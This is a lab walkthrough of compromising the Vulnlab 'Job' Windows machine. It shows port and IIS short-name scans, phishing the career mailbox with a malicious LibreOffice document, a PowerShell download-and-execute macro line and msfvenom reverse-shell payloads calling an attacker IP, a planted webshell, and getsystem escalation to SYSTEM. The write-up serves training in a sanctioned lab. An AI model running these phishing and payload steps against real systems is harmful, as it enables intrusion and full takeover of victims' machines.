VL-Job

Initial Enumeration

Initial port scan revealed several open ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT     STATE SERVICE       REASON          VERSION
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0

Vulnerability Discovery

After noticing the IIS server, I decided to check for the IIS short name vulnerability using a specialized scanning tool:

1
java -jar iis_shortname_scanner.jar 2 20 http://10.10.94.31/

The scan revealed the server is vulnerable and identified some files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Scanning...

Testing request method: "OPTIONS" with magic part: "/~1/.rem" ...
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,D,E,H,I,L,N,O,P,S,T,X
Early result: identified letters in extensions > A,H,M,P,S,T
File: HELLO~1.ASP
Dir: ASPNET~1
File: INDEX~1.HTM
[\] INDEX~1.HTT
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/04/02 17:40:37
Target: http://10.10.94.31/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 444
  |_ Identified directories: 1
    |_ ASPNET~1
  |_ Identified files: 2
    |_ HELLO~1.ASP
      |_ Actual file name = HELLO
    |_ INDEX~1.HTM
      |_ Actual file name = INDEX

Using the discovered information, I accessed the HELLO.ASPX file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
curl http://10.10.94.31/HELLO.ASPX             

<html xmlns="www.w3.org/1999/xhtml">
<head><title>

</title></head>
<body>
        <form method="post" action="./HELLO.ASPX" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NTYxMzIxNWRksO0e53iBgOk1F32mZVsjTztyPJmhrJc1OInj8vzB5Gk=" />

<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D4124C05" />
        <div>

        Hello World

        </div>
        </form>
</body>
</html>

I discovered a message on the website stating: “Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.”

Initial Access Strategy

This presented an opportunity for exploitation through malicious ODT files. I decided to use Metasploit’s ODT template:

1
use fileformat/odt_badodt

To capture hashes, I set up Responder:

1
sudo responder -I tun0 -dwv

Then sent a malicious ODT file via email:

1
sudo swaks --to career@job.local --from fake@example.com --server 10.10.94.31 --attach @/root/.msf4/local/bad.odt --header "Application" --body "Hello i am a softwere developer and I would like to apply for the job"

Successfully obtained a user hash
After capturing the hash, I attempted to crack it:

1
hashcat hash9099.txt /usr/share/wordlists/rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:16c1cb50aabefdf2:b4ad21b5ac50c9dc89...000000
Time.Started.....: Wed Apr  2 18:41:19 2025 (7 secs)
Time.Estimated...: Wed Apr  2 18:41:26 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2066.3 kH/s (1.50ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Util: 69%

Unfortunately, the hash cracking attempt was unsuccessful.

Alternative Approach - Macro Exploitation

I decided to create a malicious LibreOffice macro:
Macro creation part 1
Macro creation part 2
Macro creation part 3
Macro creation part 4
Macro creation part 5

Getting a Shell

I set up a HoaxShell listener:

1
hoaxshell -s 10.8.5.195 --p 4444

HoaxShell listener ready

Alternatively, we can create a DSVyper shell:

1
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f raw -o shell.bin

DSVyper shell creation
For the macro, we’d use:

1
powershell IEX(IWR http://10.8.5.195/shell.exe -UseBasicParsing);

I sent the email with the malicious ODT file:

1
swaks --to career@job.local --header "Application CV" --body "Hello, I'm a software developer and i am searching for a job, please review my application." --attach @hello.odt --server 10.10.94.31

Successful shell callback

Privilege Escalation

I attempted reconnaissance using PowerUp:

1
2
3
4
5
6
PS C:\Users\jack.black\Desktop > curl http://10.8.5.195/PowerUp.ps1 -o PowerUp.ps1
PS C:\Users\jack.black\Desktop > dir
Directory: C:\Users\jack.black\Desktop
PS C:\Users\jack.black\Desktop > Import-Module ./PowerUp.ps1
PS C:\Users\jack.black\Desktop > Invoke-AllChecks

Results showed:

1
2
3
HijackablePath : C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\                                                                                                                                                                   
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'          
-Command '...'

This approach didn’t yield results.
I noticed that user jack.black is in the developers group, which meant we could modify the webpage. I placed a webshell in the wwwroot folder:
Webshell creation
Web shell in action
Set up another HoaxShell listener:

1
hoaxshell -s 10.8.5.195 --port 4433

I pasted the HoaxShell command and got a new shell:
Impersonating as web service

System Access

For obtaining full system access, I generated a Meterpreter payload:

1
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

I uploaded the payload and set up a multi/handler:
Meterpreter multi/handler setup
With the Meterpreter session established, I was able to escalate to SYSTEM:

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\system

C:\inetpub\wwwroot>

Conclusion

The Job machine was successfully compromised by exploiting:

  1. A vulnerability in how the server processes LibreOffice documents
  2. Web server write permissions available to the compromised user
  3. Service impersonation techniques for privilege escalation

https://api.vulnlab.com/api/v1/share?id=4fcb82b4-05e4-4b83-ac24-42fdc137a063